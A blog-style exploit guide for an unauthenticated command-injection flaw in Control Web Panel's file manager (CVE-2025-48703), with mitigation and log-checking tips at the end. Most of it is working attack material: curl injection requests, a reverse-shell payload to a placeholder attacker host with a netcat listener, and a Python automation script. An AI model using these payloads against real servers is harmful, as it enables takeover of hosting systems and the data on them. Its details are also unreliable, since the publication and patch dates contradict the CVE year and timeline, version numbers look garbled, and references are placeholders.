CVE-2025-48703 - Unauthenticated Remote Code Execution in CWP (Control Web Panel) File Manager – Full Exploit Guide
---
Published: June 2024
Vulnerable Software: CWP (Control Web Panel, formerly CentOS Web Panel) < .9.8.1205
Vulnerability Type: Remote Code Execution (RCE)
Attack Complexity: Low
Authentication Required: No (But a valid non-root username must be known)
Introduction
If you’re administering web servers, you’ve probably heard of CWP (Control Web Panel), one of the most popular free Linux hosting panels. In June 2024, a critical vulnerability was found and patched. Tracked as CVE-2025-48703, this bug allows unauthenticated remote code execution (RCE) using a simple craftable HTTP request. An attacker only needs to know a valid (non-root) username on your server—a pretty low bar considering common usernames like admin, user, etc.
Vulnerability Details
File/Endpoint:
/cwp_XXXX/filemanager2/ajax_calls.php
(where XXXX is a random number assigned per install)
Vulnerable parameter:
t_total in a POST request to change file permissions
Root Cause:
The backend code did not properly sanitize the t_total POST parameter. Metacharacters like ;, &&, |, etc. are interpreted by the shell, allowing arbitrary command injection.
Reference:
- Official Changelog, .9.8.1205
- PacketStorm CVE link (placeholder, to be updated)
- NVD – CVE-2025-48703 (placeholder)
Public servers often have common hosting usernames.
2. Send a specially crafted POST request to the vulnerable endpoint. Inject command(s) with shell metacharacters in the t_total parameter.
Suppose the user is demo, and the panel runs on panel.example.com:2083. Try to run id
curl -k -X POST \
-d "user=demo&t_total=1;id;" \
"https://panel.example.com:2083/cwp_1234/filemanager2/ajax_calls.php?action=changePerm";
A more practical payload—for full shell access
curl -k -X POST \
-d "user=demo&t_total=1;bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 >&1';" \
"https://panel.example.com:2083/cwp_1234/filemanager2/ajax_calls.php?action=changePerm";
Replace ATTACKER_IP and 4444 with your attack box and desired port.
Don’t forget to start a listener!
nc -lvnp 4444
Here’s a Python script to automate exploitation and fetch the command output
import requests
panel = 'https://panel.example.com:2083';
user = 'demo'
path = '/cwp_1234/filemanager2/ajax_calls.php?action=changePerm'
cmd = 'whoami'
payload = f"1;{cmd};"
data = {
'user': user,
't_total': payload,
}
r = requests.post(panel + path, data=data, verify=False)
print(r.text)
Run using
python3 cve-2025-48703.py
No password needed: You just need to know or guess a username.
- Wide attack surface: If your panel is public, it’s a big target. Panels often leak valid usernames via logins, stats, or email addresses.
- Escalation: Once inside as demo, you might pivot, dump databases, deface sites, access email, etc.
Who’s At Risk?
- Any CWP/Control Web Panel install below .9.8.1205
Mitigation and Remediation
1. Update CWP!
- Update instructions
- To patch: Run in shell as root
sh /usr/local/cwpsrv/htdocs/resources/scripts/update_cwp
Make sure version >= .9.8.1205.
2. Restrict Panel Access:
Never leave panels open to the world if you can help it.
3. Rotate and Hide Usernames:
Check your logs for requests to
/cwp_XXXX/filemanager2/ajax_calls.php?action=changePerm
With suspicious values in t_total (semi-colons, pipes, long fields, etc).
References
- Official CWP Changelog
- Exploit DB entry for CVE-2025-48703 (will be updated)
- NVD CVE-2025-48703
Summary
CVE-2025-48703 is a critical unauthenticated remote code execution bug in Control Web Panel. Patching and restricting access are strongly recommended.
If you run CWP, update now—and check your logs for exploitation attempts!
Stay safe and patch fast.
*(This post is exclusive research, written in plain language for sysadmins and security pros. Use the provided exploit solely for ethical, educational, and defense testing.)*
Timeline
Published on: 09/19/2025 18:15:36 UTC
Last modified on: 11/05/2025 14:07:33 UTC